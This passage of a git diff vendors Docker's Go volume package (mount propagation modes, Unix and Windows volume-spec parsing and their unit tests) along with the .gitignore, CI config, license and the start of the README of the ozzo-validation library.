c.readOnly, err) + } + t.Logf("data=%q", data) + for _, s := range c.expectedSubstrings { + if !strings.Contains(data, s) { + t.Fatalf("expected substring: %s, got %v (case=%+v)", s, data, c) + } + } + for _, s := range c.unexpectedSubstrings { + if strings.Contains(data, s) { + t.Fatalf("unexpected substring: %s, got %v (case=%+v)", s, data, c) + } + } + } +} diff --git 
a/vendor/github.com/docker/docker/volume/volume_propagation_linux.go b/vendor/github.com/docker/docker/volume/volume_propagation_linux.go new file mode 100644 index 0000000000..1de57ab52b --- /dev/null +++ b/vendor/github.com/docker/docker/volume/volume_propagation_linux.go @@ -0,0 +1,47 @@ +// +build linux + +package volume + +import ( + "strings" + + mounttypes "github.com/docker/docker/api/types/mount" +) + +// DefaultPropagationMode defines what propagation mode should be used by +// default if user has not specified one explicitly. +// propagation modes +const DefaultPropagationMode = mounttypes.PropagationRPrivate + +var propagationModes = map[mounttypes.Propagation]bool{ + mounttypes.PropagationPrivate: true, + mounttypes.PropagationRPrivate: true, + mounttypes.PropagationSlave: true, + mounttypes.PropagationRSlave: true, + mounttypes.PropagationShared: true, + mounttypes.PropagationRShared: true, +} + +// GetPropagation extracts and returns the mount propagation mode. If there +// are no specifications, then by default it is "private". +func GetPropagation(mode string) mounttypes.Propagation { + for _, o := range strings.Split(mode, ",") { + prop := mounttypes.Propagation(o) + if propagationModes[prop] { + return prop + } + } + return DefaultPropagationMode +} + +// HasPropagation checks if there is a valid propagation mode present in +// passed string. Returns true if a valid propagation mode specifier is +// present, false otherwise. 
+func HasPropagation(mode string) bool { + for _, o := range strings.Split(mode, ",") { + if propagationModes[mounttypes.Propagation(o)] { + return true + } + } + return false +} diff --git a/vendor/github.com/docker/docker/volume/volume_propagation_linux_test.go b/vendor/github.com/docker/docker/volume/volume_propagation_linux_test.go new file mode 100644 index 0000000000..46d0265062 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/volume_propagation_linux_test.go @@ -0,0 +1,65 @@ +// +build linux + +package volume + +import ( + "strings" + "testing" +) + +func TestParseMountRawPropagation(t *testing.T) { + var ( + valid []string + invalid map[string]string + ) + + valid = []string{ + "/hostPath:/containerPath:shared", + "/hostPath:/containerPath:rshared", + "/hostPath:/containerPath:slave", + "/hostPath:/containerPath:rslave", + "/hostPath:/containerPath:private", + "/hostPath:/containerPath:rprivate", + "/hostPath:/containerPath:ro,shared", + "/hostPath:/containerPath:ro,slave", + "/hostPath:/containerPath:ro,private", + "/hostPath:/containerPath:ro,z,shared", + "/hostPath:/containerPath:ro,Z,slave", + "/hostPath:/containerPath:Z,ro,slave", + "/hostPath:/containerPath:slave,Z,ro", + "/hostPath:/containerPath:Z,slave,ro", + "/hostPath:/containerPath:slave,ro,Z", + "/hostPath:/containerPath:rslave,ro,Z", + "/hostPath:/containerPath:ro,rshared,Z", + "/hostPath:/containerPath:ro,Z,rprivate", + } + invalid = map[string]string{ + "/path:/path:ro,rshared,rslave": `invalid mode`, + "/path:/path:ro,z,rshared,rslave": `invalid mode`, + "/path:shared": "invalid volume specification", + "/path:slave": "invalid volume specification", + "/path:private": "invalid volume specification", + "name:/absolute-path:shared": "invalid volume specification", + "name:/absolute-path:rshared": "invalid volume specification", + "name:/absolute-path:slave": "invalid volume specification", + "name:/absolute-path:rslave": "invalid volume specification", + 
"name:/absolute-path:private": "invalid volume specification", + "name:/absolute-path:rprivate": "invalid volume specification", + } + + for _, path := range valid { + if _, err := ParseMountRaw(path, "local"); err != nil { + t.Fatalf("ParseMountRaw(`%q`) should succeed: error %q", path, err) + } + } + + for path, expectedError := range invalid { + if _, err := ParseMountRaw(path, "local"); err == nil { + t.Fatalf("ParseMountRaw(`%q`) should have failed validation. Err %v", path, err) + } else { + if !strings.Contains(err.Error(), expectedError) { + t.Fatalf("ParseMountRaw(`%q`) error should contain %q, got %v", path, expectedError, err.Error()) + } + } + } +} diff --git a/vendor/github.com/docker/docker/volume/volume_propagation_unsupported.go b/vendor/github.com/docker/docker/volume/volume_propagation_unsupported.go new file mode 100644 index 0000000000..7311ffc2e0 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/volume_propagation_unsupported.go @@ -0,0 +1,24 @@ +// +build !linux + +package volume + +import mounttypes "github.com/docker/docker/api/types/mount" + +// DefaultPropagationMode is used only in linux. In other cases it returns +// empty string. +const DefaultPropagationMode mounttypes.Propagation = "" + +// propagation modes not supported on this platform. +var propagationModes = map[mounttypes.Propagation]bool{} + +// GetPropagation is not supported. Return empty string. +func GetPropagation(mode string) mounttypes.Propagation { + return DefaultPropagationMode +} + +// HasPropagation checks if there is a valid propagation mode present in +// passed string. Returns true if a valid propagation mode specifier is +// present, false otherwise. 
+func HasPropagation(mode string) bool { + return false +} diff --git a/vendor/github.com/docker/docker/volume/volume_test.go b/vendor/github.com/docker/docker/volume/volume_test.go new file mode 100644 index 0000000000..54df38053f --- /dev/null +++ b/vendor/github.com/docker/docker/volume/volume_test.go @@ -0,0 +1,269 @@ +package volume + +import ( + "io/ioutil" + "os" + "runtime" + "strings" + "testing" + + "github.com/docker/docker/api/types/mount" +) + +func TestParseMountRaw(t *testing.T) { + var ( + valid []string + invalid map[string]string + ) + + if runtime.GOOS == "windows" { + valid = []string{ + `d:\`, + `d:`, + `d:\path`, + `d:\path with space`, + // TODO Windows post TP5 - readonly support `d:\pathandmode:ro`, + `c:\:d:\`, + `c:\windows\:d:`, + `c:\windows:d:\s p a c e`, + `c:\windows:d:\s p a c e:RW`, + `c:\program files:d:\s p a c e i n h o s t d i r`, + `0123456789name:d:`, + `MiXeDcAsEnAmE:d:`, + `name:D:`, + `name:D::rW`, + `name:D::RW`, + // TODO Windows post TP5 - readonly support `name:D::RO`, + `c:/:d:/forward/slashes/are/good/too`, + // TODO Windows post TP5 - readonly support `c:/:d:/including with/spaces:ro`, + `c:\Windows`, // With capital + `c:\Program Files (x86)`, // With capitals and brackets + } + invalid = map[string]string{ + ``: "invalid volume specification: ", + `.`: "invalid volume specification: ", + `..\`: "invalid volume specification: ", + `c:\:..\`: "invalid volume specification: ", + `c:\:d:\:xyzzy`: "invalid volume specification: ", + `c:`: "cannot be `c:`", + `c:\`: "cannot be `c:`", + `c:\notexist:d:`: `source path does not exist`, + `c:\windows\system32\ntdll.dll:d:`: `source path must be a directory`, + `name<:d:`: `invalid volume specification`, + `name>:d:`: `invalid volume specification`, + `name::d:`: `invalid volume specification`, + `name":d:`: `invalid volume specification`, + `name\:d:`: `invalid volume specification`, + `name*:d:`: `invalid volume specification`, + `name|:d:`: `invalid volume specification`, 
+ `name?:d:`: `invalid volume specification`, + `name/:d:`: `invalid volume specification`, + `d:\pathandmode:rw`: `invalid volume specification`, + `con:d:`: `cannot be a reserved word for Windows filenames`, + `PRN:d:`: `cannot be a reserved word for Windows filenames`, + `aUx:d:`: `cannot be a reserved word for Windows filenames`, + `nul:d:`: `cannot be a reserved word for Windows filenames`, + `com1:d:`: `cannot be a reserved word for Windows filenames`, + `com2:d:`: `cannot be a reserved word for Windows filenames`, + `com3:d:`: `cannot be a reserved word for Windows filenames`, + `com4:d:`: `cannot be a reserved word for Windows filenames`, + `com5:d:`: `cannot be a reserved word for Windows filenames`, + `com6:d:`: `cannot be a reserved word for Windows filenames`, + `com7:d:`: `cannot be a reserved word for Windows filenames`, + `com8:d:`: `cannot be a reserved word for Windows filenames`, + `com9:d:`: `cannot be a reserved word for Windows filenames`, + `lpt1:d:`: `cannot be a reserved word for Windows filenames`, + `lpt2:d:`: `cannot be a reserved word for Windows filenames`, + `lpt3:d:`: `cannot be a reserved word for Windows filenames`, + `lpt4:d:`: `cannot be a reserved word for Windows filenames`, + `lpt5:d:`: `cannot be a reserved word for Windows filenames`, + `lpt6:d:`: `cannot be a reserved word for Windows filenames`, + `lpt7:d:`: `cannot be a reserved word for Windows filenames`, + `lpt8:d:`: `cannot be a reserved word for Windows filenames`, + `lpt9:d:`: `cannot be a reserved word for Windows filenames`, + `c:\windows\system32\ntdll.dll`: `Only directories can be mapped on this platform`, + } + + } else { + valid = []string{ + "/home", + "/home:/home", + "/home:/something/else", + "/with space", + "/home:/with space", + "relative:/absolute-path", + "hostPath:/containerPath:ro", + "/hostPath:/containerPath:rw", + "/rw:/ro", + } + invalid = map[string]string{ + "": "invalid volume specification", + "./": "mount path must be absolute", + "../": 
"mount path must be absolute", + "/:../": "mount path must be absolute", + "/:path": "mount path must be absolute", + ":": "invalid volume specification", + "/tmp:": "invalid volume specification", + ":test": "invalid volume specification", + ":/test": "invalid volume specification", + "tmp:": "invalid volume specification", + ":test:": "invalid volume specification", + "::": "invalid volume specification", + ":::": "invalid volume specification", + "/tmp:::": "invalid volume specification", + ":/tmp::": "invalid volume specification", + "/path:rw": "invalid volume specification", + "/path:ro": "invalid volume specification", + "/rw:rw": "invalid volume specification", + "path:ro": "invalid volume specification", + "/path:/path:sw": `invalid mode`, + "/path:/path:rwz": `invalid mode`, + } + } + + for _, path := range valid { + if _, err := ParseMountRaw(path, "local"); err != nil { + t.Fatalf("ParseMountRaw(`%q`) should succeed: error %q", path, err) + } + } + + for path, expectedError := range invalid { + if mp, err := ParseMountRaw(path, "local"); err == nil { + t.Fatalf("ParseMountRaw(`%q`) should have failed validation. Err '%v' - MP: %v", path, err, mp) + } else { + if !strings.Contains(err.Error(), expectedError) { + t.Fatalf("ParseMountRaw(`%q`) error should contain %q, got %v", path, expectedError, err.Error()) + } + } + } +} + +// testParseMountRaw is a structure used by TestParseMountRawSplit for +// specifying test cases for the ParseMountRaw() function. 
+type testParseMountRaw struct { + bind string + driver string + expDest string + expSource string + expName string + expDriver string + expRW bool + fail bool +} + +func TestParseMountRawSplit(t *testing.T) { + var cases []testParseMountRaw + if runtime.GOOS == "windows" { + cases = []testParseMountRaw{ + {`c:\:d:`, "local", `d:`, `c:\`, ``, "", true, false}, + {`c:\:d:\`, "local", `d:\`, `c:\`, ``, "", true, false}, + // TODO Windows post TP5 - Add readonly support {`c:\:d:\:ro`, "local", `d:\`, `c:\`, ``, "", false, false}, + {`c:\:d:\:rw`, "local", `d:\`, `c:\`, ``, "", true, false}, + {`c:\:d:\:foo`, "local", `d:\`, `c:\`, ``, "", false, true}, + {`name:d::rw`, "local", `d:`, ``, `name`, "local", true, false}, + {`name:d:`, "local", `d:`, ``, `name`, "local", true, false}, + // TODO Windows post TP5 - Add readonly support {`name:d::ro`, "local", `d:`, ``, `name`, "local", false, false}, + {`name:c:`, "", ``, ``, ``, "", true, true}, + {`driver/name:c:`, "", ``, ``, ``, "", true, true}, + } + } else { + cases = []testParseMountRaw{ + {"/tmp:/tmp1", "", "/tmp1", "/tmp", "", "", true, false}, + {"/tmp:/tmp2:ro", "", "/tmp2", "/tmp", "", "", false, false}, + {"/tmp:/tmp3:rw", "", "/tmp3", "/tmp", "", "", true, false}, + {"/tmp:/tmp4:foo", "", "", "", "", "", false, true}, + {"name:/named1", "", "/named1", "", "name", "", true, false}, + {"name:/named2", "external", "/named2", "", "name", "external", true, false}, + {"name:/named3:ro", "local", "/named3", "", "name", "local", false, false}, + {"local/name:/tmp:rw", "", "/tmp", "", "local/name", "", true, false}, + {"/tmp:tmp", "", "", "", "", "", true, true}, + } + } + + for i, c := range cases { + t.Logf("case %d", i) + m, err := ParseMountRaw(c.bind, c.driver) + if c.fail { + if err == nil { + t.Fatalf("Expected error, was nil, for spec %s\n", c.bind) + } + continue + } + + if m == nil || err != nil { + t.Fatalf("ParseMountRaw failed for spec '%s', driver '%s', error '%v'", c.bind, c.driver, err.Error()) + 
continue + } + + if m.Destination != c.expDest { + t.Fatalf("Expected destination '%s, was %s', for spec '%s'", c.expDest, m.Destination, c.bind) + } + + if m.Source != c.expSource { + t.Fatalf("Expected source '%s', was '%s', for spec '%s'", c.expSource, m.Source, c.bind) + } + + if m.Name != c.expName { + t.Fatalf("Expected name '%s', was '%s' for spec '%s'", c.expName, m.Name, c.bind) + } + + if m.Driver != c.expDriver { + t.Fatalf("Expected driver '%s', was '%s', for spec '%s'", c.expDriver, m.Driver, c.bind) + } + + if m.RW != c.expRW { + t.Fatalf("Expected RW '%v', was '%v' for spec '%s'", c.expRW, m.RW, c.bind) + } + } +} + +func TestParseMountSpec(t *testing.T) { + type c struct { + input mount.Mount + expected MountPoint + } + testDir, err := ioutil.TempDir("", "test-mount-config") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(testDir) + + cases := []c{ + {mount.Mount{Type: mount.TypeBind, Source: testDir, Target: testDestinationPath, ReadOnly: true}, MountPoint{Type: mount.TypeBind, Source: testDir, Destination: testDestinationPath}}, + {mount.Mount{Type: mount.TypeBind, Source: testDir, Target: testDestinationPath}, MountPoint{Type: mount.TypeBind, Source: testDir, Destination: testDestinationPath, RW: true}}, + {mount.Mount{Type: mount.TypeBind, Source: testDir + string(os.PathSeparator), Target: testDestinationPath, ReadOnly: true}, MountPoint{Type: mount.TypeBind, Source: testDir, Destination: testDestinationPath}}, + {mount.Mount{Type: mount.TypeBind, Source: testDir, Target: testDestinationPath + string(os.PathSeparator), ReadOnly: true}, MountPoint{Type: mount.TypeBind, Source: testDir, Destination: testDestinationPath}}, + {mount.Mount{Type: mount.TypeVolume, Target: testDestinationPath}, MountPoint{Type: mount.TypeVolume, Destination: testDestinationPath, RW: true, CopyData: DefaultCopyMode}}, + {mount.Mount{Type: mount.TypeVolume, Target: testDestinationPath + string(os.PathSeparator)}, MountPoint{Type: mount.TypeVolume, Destination: 
testDestinationPath, RW: true, CopyData: DefaultCopyMode}}, + } + + for i, c := range cases { + t.Logf("case %d", i) + mp, err := ParseMountSpec(c.input) + if err != nil { + t.Fatal(err) + } + + if c.expected.Type != mp.Type { + t.Fatalf("Expected mount types to match. Expected: '%s', Actual: '%s'", c.expected.Type, mp.Type) + } + if c.expected.Destination != mp.Destination { + t.Fatalf("Expected mount destination to match. Expected: '%s', Actual: '%s'", c.expected.Destination, mp.Destination) + } + if c.expected.Source != mp.Source { + t.Fatalf("Expected mount source to match. Expected: '%s', Actual: '%s'", c.expected.Source, mp.Source) + } + if c.expected.RW != mp.RW { + t.Fatalf("Expected mount writable to match. Expected: '%v', Actual: '%v'", c.expected.RW, mp.RW) + } + if c.expected.Propagation != mp.Propagation { + t.Fatalf("Expected mount propagation to match. Expected: '%v', Actual: '%s'", c.expected.Propagation, mp.Propagation) + } + if c.expected.Driver != mp.Driver { + t.Fatalf("Expected mount driver to match. Expected: '%v', Actual: '%s'", c.expected.Driver, mp.Driver) + } + if c.expected.CopyData != mp.CopyData { + t.Fatalf("Expected mount copy data to match. Expected: '%v', Actual: '%v'", c.expected.CopyData, mp.CopyData) + } + } +} diff --git a/vendor/github.com/docker/docker/volume/volume_unix.go b/vendor/github.com/docker/docker/volume/volume_unix.go new file mode 100644 index 0000000000..0256ebb2ba --- /dev/null +++ b/vendor/github.com/docker/docker/volume/volume_unix.go @@ -0,0 +1,138 @@ +// +build linux freebsd darwin solaris + +package volume + +import ( + "fmt" + "os" + "path/filepath" + "strings" + + mounttypes "github.com/docker/docker/api/types/mount" +) + +var platformRawValidationOpts = []func(o *validateOpts){ + // need to make sure to not error out if the bind source does not exist on unix + // this is supported for historical reasons, the path will be automatically + // created later. 
+ func(o *validateOpts) { o.skipBindSourceCheck = true }, +} + +// read-write modes +var rwModes = map[string]bool{ + "rw": true, + "ro": true, +} + +// label modes +var labelModes = map[string]bool{ + "Z": true, + "z": true, +} + +// BackwardsCompatible decides whether this mount point can be +// used in old versions of Docker or not. +// Only bind mounts and local volumes can be used in old versions of Docker. +func (m *MountPoint) BackwardsCompatible() bool { + return len(m.Source) > 0 || m.Driver == DefaultDriverName +} + +// HasResource checks whether the given absolute path for a container is in +// this mount point. If the relative path starts with `../` then the resource +// is outside of this mount point, but we can't simply check for this prefix +// because it misses `..` which is also outside of the mount, so check both. +func (m *MountPoint) HasResource(absolutePath string) bool { + relPath, err := filepath.Rel(m.Destination, absolutePath) + return err == nil && relPath != ".." && !strings.HasPrefix(relPath, fmt.Sprintf("..%c", filepath.Separator)) +} + +// IsVolumeNameValid checks a volume name in a platform specific manner. +func IsVolumeNameValid(name string) (bool, error) { + return true, nil +} + +// ValidMountMode will make sure the mount mode is valid. +// returns if it's a valid mount mode or not. +func ValidMountMode(mode string) bool { + if mode == "" { + return true + } + + rwModeCount := 0 + labelModeCount := 0 + propagationModeCount := 0 + copyModeCount := 0 + + for _, o := range strings.Split(mode, ",") { + switch { + case rwModes[o]: + rwModeCount++ + case labelModes[o]: + labelModeCount++ + case propagationModes[mounttypes.Propagation(o)]: + propagationModeCount++ + case copyModeExists(o): + copyModeCount++ + default: + return false + } + } + + // Only one string for each mode is allowed. 
+ if rwModeCount > 1 || labelModeCount > 1 || propagationModeCount > 1 || copyModeCount > 1 { + return false + } + return true +} + +// ReadWrite tells you if a mode string is a valid read-write mode or not. +// If there are no specifications w.r.t read write mode, then by default +// it returns true. +func ReadWrite(mode string) bool { + if !ValidMountMode(mode) { + return false + } + + for _, o := range strings.Split(mode, ",") { + if o == "ro" { + return false + } + } + return true +} + +func validateNotRoot(p string) error { + p = filepath.Clean(convertSlash(p)) + if p == "/" { + return fmt.Errorf("invalid specification: destination can't be '/'") + } + return nil +} + +func validateCopyMode(mode bool) error { + return nil +} + +func convertSlash(p string) string { + return filepath.ToSlash(p) +} + +func splitRawSpec(raw string) ([]string, error) { + if strings.Count(raw, ":") > 2 { + return nil, errInvalidSpec(raw) + } + + arr := strings.SplitN(raw, ":", 3) + if arr[0] == "" { + return nil, errInvalidSpec(raw) + } + return arr, nil +} + +func clean(p string) string { + return filepath.Clean(p) +} + +func validateStat(fi os.FileInfo) error { + return nil +} diff --git a/vendor/github.com/docker/docker/volume/volume_unsupported.go b/vendor/github.com/docker/docker/volume/volume_unsupported.go new file mode 100644 index 0000000000..ff9d6afa27 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/volume_unsupported.go @@ -0,0 +1,16 @@ +// +build !linux + +package volume + +import ( + "fmt" + "runtime" + + mounttypes "github.com/docker/docker/api/types/mount" +) + +// ConvertTmpfsOptions converts *mounttypes.TmpfsOptions to the raw option string +// for mount(2). 
+func ConvertTmpfsOptions(opt *mounttypes.TmpfsOptions, readOnly bool) (string, error) { + return "", fmt.Errorf("%s does not support tmpfs", runtime.GOOS) +} diff --git a/vendor/github.com/docker/docker/volume/volume_windows.go b/vendor/github.com/docker/docker/volume/volume_windows.go new file mode 100644 index 0000000000..22f6fc7a14 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/volume_windows.go @@ -0,0 +1,201 @@ +package volume + +import ( + "fmt" + "os" + "path/filepath" + "regexp" + "strings" +) + +// read-write modes +var rwModes = map[string]bool{ + "rw": true, +} + +// read-only modes +var roModes = map[string]bool{ + "ro": true, +} + +var platformRawValidationOpts = []func(*validateOpts){ + // filepath.IsAbs is weird on Windows: + // `c:` is not considered an absolute path + // `c:\` is considered an absolute path + // In any case, the regex matching below ensures absolute paths + // TODO: consider this a bug with filepath.IsAbs (?) + func(o *validateOpts) { o.skipAbsolutePathCheck = true }, +} + +const ( + // Spec should be in the format [source:]destination[:mode] + // + // Examples: c:\foo bar:d:rw + // c:\foo:d:\bar + // myname:d: + // d:\ + // + // Explanation of this regex! Thanks @thaJeztah on IRC and gist for help. See + // https://gist.github.com/thaJeztah/6185659e4978789fb2b2. A good place to + // test is https://regex-golang.appspot.com/assets/html/index.html + // + // Useful link for referencing named capturing groups: + // http://stackoverflow.com/questions/20750843/using-named-matches-from-go-regex + // + // There are three match groups: source, destination and mode. 
+ // + + // RXHostDir is the first option of a source + RXHostDir = `[a-z]:\\(?:[^\\/:*?"<>|\r\n]+\\?)*` + // RXName is the second option of a source + RXName = `[^\\/:*?"<>|\r\n]+` + // RXReservedNames are reserved names not possible on Windows + RXReservedNames = `(con)|(prn)|(nul)|(aux)|(com[1-9])|(lpt[1-9])` + + // RXSource is the combined possibilities for a source + RXSource = `((?P((` + RXHostDir + `)|(` + RXName + `))):)?` + + // Source. Can be either a host directory, a name, or omitted: + // HostDir: + // - Essentially using the folder solution from + // https://www.safaribooksonline.com/library/view/regular-expressions-cookbook/9781449327453/ch08s18.html + // but adding case insensitivity. + // - Must be an absolute path such as c:\path + // - Can include spaces such as `c:\program files` + // - And then followed by a colon which is not in the capture group + // - And can be optional + // Name: + // - Must not contain invalid NTFS filename characters (https://msdn.microsoft.com/en-us/library/windows/desktop/aa365247(v=vs.85).aspx) + // - And then followed by a colon which is not in the capture group + // - And can be optional + + // RXDestination is the regex expression for the mount destination + RXDestination = `(?P([a-z]):((?:\\[^\\/:*?"<>\r\n]+)*\\?))` + // Destination (aka container path): + // - Variation on hostdir but can be a drive followed by colon as well + // - If a path, must be absolute. Can include spaces + // - Drive cannot be c: (explicitly checked in code, not RegEx) + + // RXMode is the regex expression for the mode of the mount + // Mode (optional): + // - Hopefully self explanatory in comparison to above regex's. + // - Colon is not in the capture group + RXMode = `(:(?P(?i)ro|rw))?` +) + +// BackwardsCompatible decides whether this mount point can be +// used in old versions of Docker or not. +// Windows volumes are never backwards compatible. 
+func (m *MountPoint) BackwardsCompatible() bool { + return false +} + +func splitRawSpec(raw string) ([]string, error) { + specExp := regexp.MustCompile(`^` + RXSource + RXDestination + RXMode + `$`) + match := specExp.FindStringSubmatch(strings.ToLower(raw)) + + // Must have something back + if len(match) == 0 { + return nil, errInvalidSpec(raw) + } + + var split []string + matchgroups := make(map[string]string) + // Pull out the sub expressions from the named capture groups + for i, name := range specExp.SubexpNames() { + matchgroups[name] = strings.ToLower(match[i]) + } + if source, exists := matchgroups["source"]; exists { + if source != "" { + split = append(split, source) + } + } + if destination, exists := matchgroups["destination"]; exists { + if destination != "" { + split = append(split, destination) + } + } + if mode, exists := matchgroups["mode"]; exists { + if mode != "" { + split = append(split, mode) + } + } + // Fix #26329. If the destination appears to be a file, and the source is null, + // it may be because we've fallen through the possible naming regex and hit a + // situation where the user intention was to map a file into a container through + // a local volume, but this is not supported by the platform. + if matchgroups["source"] == "" && matchgroups["destination"] != "" { + validName, err := IsVolumeNameValid(matchgroups["destination"]) + if err != nil { + return nil, err + } + if !validName { + if fi, err := os.Stat(matchgroups["destination"]); err == nil { + if !fi.IsDir() { + return nil, fmt.Errorf("file '%s' cannot be mapped. Only directories can be mapped on this platform", matchgroups["destination"]) + } + } + } + } + return split, nil +} + +// IsVolumeNameValid checks a volume name in a platform specific manner. 
+func IsVolumeNameValid(name string) (bool, error) { + nameExp := regexp.MustCompile(`^` + RXName + `$`) + if !nameExp.MatchString(name) { + return false, nil + } + nameExp = regexp.MustCompile(`^` + RXReservedNames + `$`) + if nameExp.MatchString(name) { + return false, fmt.Errorf("volume name %q cannot be a reserved word for Windows filenames", name) + } + return true, nil +} + +// ValidMountMode will make sure the mount mode is valid. +// returns if it's a valid mount mode or not. +func ValidMountMode(mode string) bool { + if mode == "" { + return true + } + return roModes[strings.ToLower(mode)] || rwModes[strings.ToLower(mode)] +} + +// ReadWrite tells you if a mode string is a valid read-write mode or not. +func ReadWrite(mode string) bool { + return rwModes[strings.ToLower(mode)] || mode == "" +} + +func validateNotRoot(p string) error { + p = strings.ToLower(convertSlash(p)) + if p == "c:" || p == `c:\` { + return fmt.Errorf("destination path cannot be `c:` or `c:\\`: %v", p) + } + return nil +} + +func validateCopyMode(mode bool) error { + if mode { + return fmt.Errorf("Windows does not support copying image path content") + } + return nil +} + +func convertSlash(p string) string { + return filepath.FromSlash(p) +} + +func clean(p string) string { + if match, _ := regexp.MatchString("^[a-z]:$", p); match { + return p + } + return filepath.Clean(p) +} + +func validateStat(fi os.FileInfo) error { + if !fi.IsDir() { + return fmt.Errorf("source path must be a directory") + } + return nil +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/.gitignore b/vendor/github.com/go-ozzo/ozzo-validation/.gitignore new file mode 100644 index 0000000000..daf913b1b3 --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/.gitignore @@ -0,0 +1,24 @@ +# Compiled Object files, Static and Dynamic libs (Shared Objects) +*.o +*.a +*.so + +# Folders +_obj +_test + +# Architecture specific extensions/prefixes +*.[568vq] +[568vq].out + +*.cgo1.go +*.cgo2.c +_cgo_defun.c 
+_cgo_gotypes.go +_cgo_export.* + +_testmain.go + +*.exe +*.test +*.prof diff --git a/vendor/github.com/go-ozzo/ozzo-validation/.travis.yml b/vendor/github.com/go-ozzo/ozzo-validation/.travis.yml new file mode 100644 index 0000000000..aedd4540b4 --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/.travis.yml @@ -0,0 +1,16 @@ +language: go + +go: + - 1.6 + - 1.7 + - tip + +install: + - go get golang.org/x/tools/cmd/cover + - go get github.com/mattn/goveralls + - go list -f '{{range .Imports}}{{.}} {{end}}' ./... | xargs go get -v + - go list -f '{{range .TestImports}}{{.}} {{end}}' ./... | xargs go get -v + +script: + - go test -v -covermode=count -coverprofile=coverage.out + - $HOME/gopath/bin/goveralls -coverprofile=coverage.out -service=travis-ci diff --git a/vendor/github.com/go-ozzo/ozzo-validation/LICENSE b/vendor/github.com/go-ozzo/ozzo-validation/LICENSE new file mode 100644 index 0000000000..d235be9cc6 --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/LICENSE @@ -0,0 +1,17 @@ +The MIT License (MIT) +Copyright (c) 2016, Qiang Xue + +Permission is hereby granted, free of charge, to any person obtaining a copy of this software +and associated documentation files (the "Software"), to deal in the Software without restriction, +including without limitation the rights to use, copy, modify, merge, publish, distribute, +sublicense, and/or sell copies of the Software, and to permit persons to whom the Software +is furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all copies or +substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING +BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND +NONINFRINGEMENT. 
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, +DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/vendor/github.com/go-ozzo/ozzo-validation/README.md b/vendor/github.com/go-ozzo/ozzo-validation/README.md new file mode 100644 index 0000000000..1841a7cb49 --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/README.md @@ -0,0 +1,530 @@ +# ozzo-validation + +[![GoDoc](https://godoc.org/github.com/go-ozzo/ozzo-validation?status.png)](http://godoc.org/github.com/go-ozzo/ozzo-validation) +[![Build Status](https://travis-ci.org/go-ozzo/ozzo-validation.svg?branch=master)](https://travis-ci.org/go-ozzo/ozzo-validation) +[![Coverage Status](https://coveralls.io/repos/github/go-ozzo/ozzo-validation/badge.svg?branch=master)](https://coveralls.io/github/go-ozzo/ozzo-validation?branch=master) +[![Go Report](https://goreportcard.com/badge/github.com/go-ozzo/ozzo-validation)](https://goreportcard.com/report/github.com/go-ozzo/ozzo-validation) + +## Description + +ozzo-validation is a Go package that provides configurable and extensible data validation capabilities. +It has the following features: + +* use normal programming constructs rather than error-prone struct tags to specify how data should be validated. +* can validate data of different types, e.g., structs, strings, byte slices, slices, maps, arrays. +* can validate custom data types as long as they implement the `Validatable` interface. +* can validate data types that implement the `sql.Valuer` interface (e.g. `sql.NullString`). +* customizable and well-formatted validation errors. +* provide a rich set of validation rules right out of box. +* extremely easy to create and use custom validation rules. + + +## Requirements + +Go 1.6 or above. 
+ + +## Getting Started + +The ozzo-validation package mainly includes a set of validation rules and two validation methods. You use +validation rules to describe how a value should be considered valid, and you call either `validation.Validate()` +or `validation.ValidateStruct()` to validate the value. + + +### Installation + +Run the following command to install the package: + +``` +go get github.com/go-ozzo/ozzo-validation +go get github.com/go-ozzo/ozzo-validation/is +``` + +### Validating a Simple Value + +For a simple value, such as a string or an integer, you may use `validation.Validate()` to validate it. For example, + +```go +package main + +import ( + "fmt" + + "github.com/go-ozzo/ozzo-validation" + "github.com/go-ozzo/ozzo-validation/is" +) + +func main() { + data := "example" + err := validation.Validate(data, + validation.Required, // not empty + validation.Length(5, 100), // length between 5 and 100 + is.URL, // is a valid URL + ) + fmt.Println(err) + // Output: + // must be a valid URL +} +``` + +The method `validation.Validate()` will run through the rules in the order that they are listed. If a rule fails +the validation, the method will return the corresponding error and skip the rest of the rules. The method will +return nil if the value passes all validation rules. + + +### Validating a Struct + +For a struct value, you usually want to check if its fields are valid. For example, in a RESTful application, you +may unmarshal the request payload into a struct and then validate the struct fields. If one or multiple fields +are invalid, you may want to get an error describing which fields are invalid. You can use `validation.ValidateStruct()` +to achieve this purpose. A single struct can have rules for multiple fields, and a field can be associated with multiple +rules. 
For example, + +```go +package main + +import ( + "fmt" + "regexp" + + "github.com/go-ozzo/ozzo-validation" + "github.com/go-ozzo/ozzo-validation/is" +) + +type Address struct { + Street string + City string + State string + Zip string +} + +func (a Address) Validate() error { + return validation.ValidateStruct(&a, + // Street cannot be empty, and the length must between 5 and 50 + validation.Field(&a.Street, validation.Required, validation.Length(5, 50)), + // City cannot be empty, and the length must between 5 and 50 + validation.Field(&a.City, validation.Required, validation.Length(5, 50)), + // State cannot be empty, and must be a string consisting of two letters in upper case + validation.Field(&a.State, validation.Required, validation.Match(regexp.MustCompile("^[A-Z]{2}$"))), + // State cannot be empty, and must be a string consisting of five digits + validation.Field(&a.Zip, validation.Required, validation.Match(regexp.MustCompile("^[0-9]{5}$"))), + ) +} + +func main() { + a := Address{ + Street: "123", + City: "Unknown", + State: "Virginia", + Zip: "12345", + } + + err := a.Validate() + 